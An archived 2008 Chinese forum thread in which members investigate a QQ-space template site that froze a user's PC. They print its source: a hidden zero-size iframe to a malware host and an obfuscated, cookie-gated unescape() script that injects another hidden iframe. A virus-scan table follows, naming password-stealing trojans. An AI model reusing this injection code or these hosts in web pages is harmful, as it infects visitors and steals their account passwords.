世界之窗论坛's Archiver

cjcj915007 发表于 2008-4-8 20:33

浏览这个网站遇到卡死(问题解决,有兴趣和我一样学习学习)

[color=red]网页有问题,请勿点击。[/color]
[color=#ff0000][/color]
[color=#ff0000]网页问题,不是tw ,有不小心中木马,不好意思哈!!:lol: :lol: [/color]

这个网站 好奇怪,我用世界之窗浏览器最新版打开时,cpu显示并不高,但硬盘狂转,内存用的差不多了,
半天没动静
hxxp://www.qzonex.com/html/qqmb/gx/
[color=red](http改为hxxp再发上来测试,最好不要像我,自己先试一下网址是否安全,h[color=darkgreen]xx[/color]p://bbs.ioage.com/cn/viewthread.php?tid=46696,这个网址绝对没有问题
[/color][url=http://bbs.ioage.com/cn/viewthread.php?tid=46696][color=red]http://bbs.ioage.com/cn/viewthread.php?tid=46696[/color][/url][color=red],看看专家是怎么说的:lol:

测试网址安全的链接是[/color][url=http://linkscanner.explabs.com/linkscanner/default.asp][color=red]http://linkscanner.explabs.com/linkscanner/default.asp[/color][/url][color=red](应该没发错吧),下面有专家的测试结果图片)[/color]

[[i] 本帖最后由 cjcj915007 于 2008-4-9 09:26 编辑 [/i]]

uijxviid 发表于 2008-4-8 20:43

[size=6][color=red]千万别点![/color][/size]
[size=6][color=red]千万别点![/color][/size]
[size=6][color=#ff0000][/color][/size]
[size=6][color=#ff0000][/color][/size]
[size=6][color=#ff0000]楼主居心不良,挂了马,还有病毒!!![/color][/size]

cjcj915007 发表于 2008-4-8 20:43

不好意思,刚才用ie试了下,也卡了,但好像症状要请点。

杀毒软件nod32没有报毒,文件监控和防火墙都是开的在,而且是最新的病毒库。

有没有高手能帮我分析一下。:loveliness: :P

cjcj915007 发表于 2008-4-8 20:46

真的挂了马吗?我的杀毒软件没有报啊?

楼上用的什么杀毒软件啊!!:@
我用的是ess带防火墙的,病毒库都在更新

不好意思我用了影子系统所以开网站无所谓的。:lol:

真的有木马?nod32不行。

uijxviid 发表于 2008-4-8 20:52

幸亏我也用影子,要不然,今天晚上的时间就给你折腾没了!
这样很不好,如果你是无意的,让别人替你淌浑水也不厚道。如果是有意的,可就有点太哪个了……

vicandy 发表于 2008-4-8 20:53

网页有问题,请勿点击。
[attach]42932[/attach]

cjcj915007 发表于 2008-4-8 21:18

绝对无意,因为杀毒软件没有任何反应,所以就没有往木马丄想。

:lol:

uijxviid 发表于 2008-4-8 21:54

不是无意,而是太可恶!
我要是版主,杀无赦!

VVVXXX 发表于 2008-4-8 23:10

回复 3# 的帖子

在网页的最后有一句:
<iframe src=http://c4.5i6.us/c4.htm?a024 width=0 height=0></iframe>

这就是该死的网页木马大本营

VVVXXX 发表于 2008-4-8 23:11

继续追踪:


<iframe src=w/u.html width=0 height=0></iframe>


<script language="javascript" type="text/javascript" src="http://js.users.51.la/1576651.js"></script>

VVVXXX 发表于 2008-4-8 23:14

继续追踪:

// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6651tf="51la";var a6651pu="";var a6651pf="51la";var a6651su=window.location;var a6651sf=document.referrer;var a6651of="";var a6651op="";var a6651ops=1;var a6651ot=1;var a6651d=new Date();var a6651color="";if (navigator.appName=="Netscape"){a6651color=screen.pixelDepth;} else {a6651color=screen.colorDepth;}<\/script><script>a6651tf=top.document.referrer;<\/script><script>a6651pu =window.parent.location;<\/script><script>a6651pf=window.parent.document.referrer;<\/script><script>a6651ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6651ops=(a6651ops==null)?1: (parseInt(unescape((a6651ops)[2]))+1);var a6651oe =new Date();a6651oe.setTime(a6651oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6651ops+ ";path=/;expires="+a6651oe.toGMTString();a6651ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6651ot==null){a6651ot=1;}else{a6651ot=parseInt(unescape((a6651ot)[2])); a6651ot=(a6651ops==1)?(a6651ot+1):(a6651ot);}a6651oe.setTime(a6651oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6651ot+";path=/;expires="+a6651oe.toGMTString();<\/script><script>a6651of=a6651sf;if(a6651pf!=="51la"){a6651of=a6651pf;}if(a6651tf!=="51la"){a6651of=a6651tf;}a6651op=a6651pu;try{lainframe}catch(e){a6651op=a6651su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1576651&tpages=\'+a6651ops+\'&ttimes=\'+a6651ot+\'&tzone=\'+(0-a6651d.getTimezoneOffset()/60)+\'&tcolor=\'+a6651color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6651of)+\'&vpage=\'+escape(a6651op)+\'" \/>\');<\/script>');


噢噢噢,是个计数器?难道linkscanner提示有误?
反正我的卡巴没有报警
虽然硬盘闪的厉害

VVVXXX 发表于 2008-4-8 23:23

[code]

<LINK
href="/imgs/onair.css" type=text/css rel=stylesheet>


BODY {
        BACKGROUND-COLOR: #000000
}
BODY {
        COLOR: #ffffff;
        background-image: url(/imgs/bg01.jpg);
}
TD {
        COLOR: #ffffff
}
TH {
        COLOR: #ffffff
}
A:link {
        COLOR: #ffffff;
        text-decoration: none;
}
A:visited {
        COLOR: #ffffff;
        text-decoration: none;
}
A:active {
        COLOR: #ffffff;
        text-decoration: none;
}
.STYLE21 {font-size: 12px}
a:hover {
        text-decoration: none;
}
.STYLE26 {color: #CC0033}
.STYLE10 {
        COLOR: #000000
}
.STYLE13 {color: #FFFFFF}
.STYLE6 {font-size: 12px; color: #FFFFFF; }
.STYLE31 {color: #FF0066}
.STYLE32 {font-size: 9px}
.STYLE35 {font-family: "宋体";
        font-weight: bold;
}





















留言编辑器|彩色日志生成工具| 简体转繁体|首创QQ空间互踩联盟



<A
onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('www.qzonex.com');"
href="#"> 设为首页  <A
onclick=jscript:window.external.AddFavorite(document.location.href,document.title);
href="javascript:;">加入收藏




























| 网站首页 | QQ空间模板 | QQ空间代码 | QQ空间影音 | QQ表情素材 | QQ**新闻 | Q Q 网 名 | 非主流图片 | 非主流音乐视听 |
























if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%61%63%6B%69%69%2E%6E%65%74%2F%63%34%2E%68%74%6D%3F%62%30%30%38%20%77%69%64%74%68%3D%31%30%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

































相关分类
























FD模板











Flash模板











明星卡通模板























非主流个性模板




























热门文章









·qq空间免费模板--qq空间粉色模

·qq空间大图模板--qq空间黑色大

·qq空间黑色模板--qq空间黑色大

·超酷大模板-你是我的专属天使

·QQ空间粉色大图模块:浪漫的爱

·不想让你寂寞黑色大模板

·QQ空间图片:黑色一款风格模板

·QQ空间大图模块=你会爱我一辈子

· QQ空间经典时尚黑色模板

·QQ空间大图模板--因为爱情

·黑色非主流颓废模板-禁止入内

·非主流葬之个性黑色模板

·非主流一生的承诺秀出自己

·QQ空间非主流模板-- 不要脸

·qq空间黑色模板--我要忘了你























































主页>QQ空间模板>非主流个性模板>列表

收藏到QQ书签





[table=98%,#000000]







[/code]

dream7758521 发表于 2008-4-8 23:57

病毒网站

dream7758521 发表于 2008-4-8 23:59

[table=98%][tr][td=1,1,80][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]软件名称[img]http://virscan.org/images/arrow-down.gif[/img][/color][/url][/td][td=1,1,90][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]引擎版本
[/color][/url][/td][td=1,1,90][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]病毒库版本
[/color][/url][/td][td=1,1,80][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]病毒库时间
[/color][/url][/td][td][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]扫描结果
[/color][/url][/td][td=1,1,40][url=http://virscan.org/report/b6e4abfa495c2e2f051186ca1b042c2d.html#][color=#800080]时间
[/color][/url][/td][/tr][tr][td=1,1,80]a-squared[/td][td=1,1,90]3.0.0.126[/td][td=1,1,90]2008.04.07[/td][td=1,1,80]2008-04-07[/td][td][color=green]-[/color]
[/td][td=1,1,40]3.856[/td][/tr][tr][td=1,1,80]AntiVir[/td][td=1,1,90]7.6.0.81[/td][td=1,1,90]7.0.3.134[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]TR/PSW.OnlineGames.zdl[/color]
[/td][td=1,1,40]4.967[/td][/tr][tr][td=1,1,80]Arcavir[/td][td=1,1,90]1.0.4[/td][td=1,1,90]200804081100[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Riskware.Downloader.Winfixer.Fs[/color]
[/td][td=1,1,40]1.907[/td][/tr][tr][td=1,1,80]AVAST[/td][td=1,1,90]1.0.8[/td][td=1,1,90]080408-0[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Win32:OnLineGames-CYD [Trj][/color]
[/td][td=1,1,40]3.459[/td][/tr][tr][td=1,1,80]AVG[/td][td=1,1,90]7.5.51.442[/td][td=1,1,90]269.22.9/1365[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]PSW.OnlineGames.AJWG[/color]
[/td][td=1,1,40]6.453[/td][/tr][tr][td=1,1,80]BitDefender[/td][td=1,1,90]7.60825.1132035[/td][td=1,1,90]7.18369[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Generic.PWS.Games.4.61A4042C[/color]
[/td][td=1,1,40]6.988[/td][/tr][tr][td=1,1,80]CA (VET)[/td][td=1,1,90]9.0.0.143[/td][td=1,1,90]31.3.5681[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Win32/Frethog!generic trojan. [/color]
[/td][td=1,1,40]14.003[/td][/tr][tr][td=1,1,80]ClamAV [/td][td=1,1,90]0.92[/td][td=1,1,90]6668[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]PUA.Packed.UPack-3[/color]
[/td][td=1,1,40]0.235[/td][/tr][tr][td=1,1,80]Comodo[/td][td=1,1,90]2.11[/td][td=1,1,90]2.0.0.489[/td][td=1,1,80]2008-04-08[/td][td][color=green]-[/color]
[/td][td=1,1,40]1.439[/td][/tr][tr][td=1,1,80]CP Secure[/td][td=1,1,90]1.1.0.715[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Troj.PSW.W32.OnLineGames.yzu[/color]
[/td][td=1,1,40]13.797[/td][/tr][tr][td=1,1,80]Dr.WEB[/td][td=1,1,90]4.44.0.9170[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trojan.PWS.Wsgame.4214[/color]
[/td][td=1,1,40]12.893[/td][/tr][tr][td=1,1,80]ewido[/td][td=1,1,90]4.0.0.2[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=green]-[/color]
[/td][td=1,1,40]3.797[/td][/tr][tr][td=1,1,80]F-PROT[/td][td=1,1,90]4.4.1.52[/td][td=1,1,90]20080408[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Possible W32/Heuristic-162!Eldorado (damaged, not disinfectable)[/color]
[/td][td=1,1,40]3.218[/td][/tr][tr][td=1,1,80]F-SECURE[/td][td=1,1,90]5.51.6100[/td][td=1,1,90]2008.04.08.02[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trojan-PSW.Win32.OnLineGames.yzu [AVP][/color]
[/td][td=1,1,40]2.162[/td][/tr][tr][td=1,1,80]IKARUS[/td][td=1,1,90]T3.1.01.26[/td][td=1,1,90]2008.04.07.70568[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Trojan-Spy.Win32.Delf.PD[/color]
[/td][td=1,1,40]4.965[/td][/tr][tr][td=1,1,80]Microsoft[/td][td=1,1,90]1.3408[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]PWS:Win32/Frethog.AD[/color]
[/td][td=1,1,40]8.882[/td][/tr][tr][td=1,1,80]MKS_VIR[/td][td=1,1,90]2.01[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Heur.Win32[/color]
[/td][td=1,1,40]2.755[/td][/tr][tr][td=1,1,80]NORMAN[/td][td=1,1,90]5.91.10[/td][td=1,1,90]5.90[/td][td=1,1,80]2008-03-31[/td][td][color=#cc0000]W32/Suspicious_U.gen[/color]
[/td][td=1,1,40]5.154[/td][/tr][tr][td=1,1,80]nProtect[/td][td=1,1,90]2008-04-08.00[/td][td=1,1,90]1368342[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trojan-PWS/W32.WebGame.18832.B[/color]
[/td][td=1,1,40]5.305[/td][/tr][tr][td=1,1,80]Prevx[/td][td=1,1,90]V2[/td][td=1,1,90]20080408[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]TROJAN.VB.AJZ[/color]
[/td][td=1,1,40]17.431[/td][/tr][tr][td=1,1,80]QuickHeal[/td][td=1,1,90]9.00[/td][td=1,1,90]2008.04.07[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Sub7_2.0[/color]
[/td][td=1,1,40]3.011[/td][/tr][tr][td=1,1,80]SOPHOS[/td][td=1,1,90]2.72.0[/td][td=1,1,90]4.28[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Mal/Packer[/color]
[/td][td=1,1,40]3.639[/td][/tr][tr][td=1,1,80]The Hacker[/td][td=1,1,90]6.2.92[/td][td=1,1,90]v00267[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Trojan/PSW.OnLineGames.yut[/color]
[/td][td=1,1,40]1.222[/td][/tr][tr][td=1,1,80]VBA32[/td][td=1,1,90]3.12.6.4[/td][td=1,1,90]20080407.1302[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]MalwareScope.Trojan-PSW.Game.1[/color]
[/td][td=1,1,40]6.326[/td][/tr][tr][td=1,1,80]ViRobot[/td][td=1,1,90]20080407[/td][td=1,1,90]2008.04.07[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Trojan.Win32.PSWIGames.19948[/color]
[/td][td=1,1,40]0.623[/td][/tr][tr][td=1,1,80]VirusBuster[/td][td=1,1,90]4.3.19:9[/td][td=1,1,90]9.123.34/11.0[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Packed/Upack[/color]
[/td][td=1,1,40]3.195[/td][/tr][tr][td=1,1,80]卡巴斯基[/td][td=1,1,90]5.5.10[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trojan-PSW.Win32.OnLineGames.yzu[/color]
[/td][td=1,1,40]15.714[/td][/tr][tr][td=1,1,80]安博士V3[/td][td=1,1,90]2008.04.08.01[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Win-Trojan/OnlineGameHack.19948.B[/color]
[/td][td=1,1,40]1.483[/td][/tr][tr][td=1,1,80]江民杀毒[/td][td=1,1,90]10.00.650[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trojan/PSW.OnLineGames.aavi[/color]
[/td][td=1,1,40]1.772[/td][/tr][tr][td=1,1,80]熊猫卫士[/td][td=1,1,90]9.04.03.0001[/td][td=1,1,90]2008.04.08[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Trj/QQPass.AZS      [/color]
[/td][td=1,1,40]6.316[/td][/tr][tr][td=1,1,80]瑞星[/td][td=1,1,90]20.0[/td][td=1,1,90]20.39.12.00[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Packer.Win32.Upack.a[/color]
[/td][td=1,1,40]3.309[/td][/tr][tr][td=1,1,80]赛门铁克[/td][td=1,1,90]1.3.0.24[/td][td=1,1,90]20080407.002[/td][td=1,1,80]2008-04-07[/td][td][color=#cc0000]Infostealer.Gampass[/color]
[/td][td=1,1,40]0.771[/td][/tr][tr][td=1,1,80]趋势[/td][td=1,1,90]8.500-1001[/td][td=1,1,90]5.206.07[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]TSPY_ONLINEG.NU[/color]
[/td][td=1,1,40]9.146[/td][/tr][tr][td=1,1,80]迈克菲[/td][td=1,1,90]5.2.00[/td][td=1,1,90]5269[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]New Malware.aj[/color]
[/td][td=1,1,40]16.436[/td][/tr][tr][td=1,1,80]金山毒霸[/td][td=1,1,90]2007.6.20.249[/td][td=1,1,90]2008.4.8[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]Win32.Troj.OnLineGames.ae.94440[/color]
[/td][td=1,1,40]1.313[/td][/tr][tr][td=1,1,80]飞塔[/td][td=1,1,90]2.81-3.11[/td][td=1,1,90]8.940[/td][td=1,1,80]2008-04-08[/td][td][color=#cc0000]W32/OnlineGames.AQC!tr.pws[/color]
[/td][td=1,1,40]2.239[/td][/tr][/table]

81635631 发表于 2008-4-9 00:44

呵呵 ls的都是高手

cjcj915007 发表于 2008-4-9 09:33

[quote]原帖由 [i]VVVXXX[/i] 于 2008-4-8 23:10 发表 [url=http://bbs.ioage.com/cn/redirect.php?goto=findpost&pid=520137&ptid=55088][img]http://bbs.ioage.com/cn/images/common/back.gif[/img][/url]
在网页的最后有一句:
这就是该死的网页木马大本营[/quote]

就是这一句看懂了,后面的都看不懂,gs!pf!:@

cjcj915007 发表于 2008-4-9 09:42

回复 13# 的帖子

猛!别告诉我都是在那个链接里查出来的,可是我的杀毒软件没有反应啊,病毒库是4月5号的,
ESS文件监控和防火墙,总之默认的都开了,没有任何反应,:sad:
是不是防火墙问题,听说ess自身的防火墙不太好,:cold:

你是在哪个地方测试的能同时用这么多杀毒软件查杀:water: 学习一下。:water:

还有,你用的是沙盘吗?感觉怎么样啊,我用的是shadowuser(因为设置比较详细,虽然几年没有跟新了),沙盘好像运行什么都得先打开沙盘,就是这点有点麻烦。

VVVXXX 发表于 2008-4-9 23:32

不知道为什么,昨天我同样用的沙盘试验,就没有观察到异常进程,
只听到硬盘狂想,等了一会儿,没异常进程我就强制停掉了
可能我机器太老了,网速太慢了,病毒还没下载完:sweat:

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.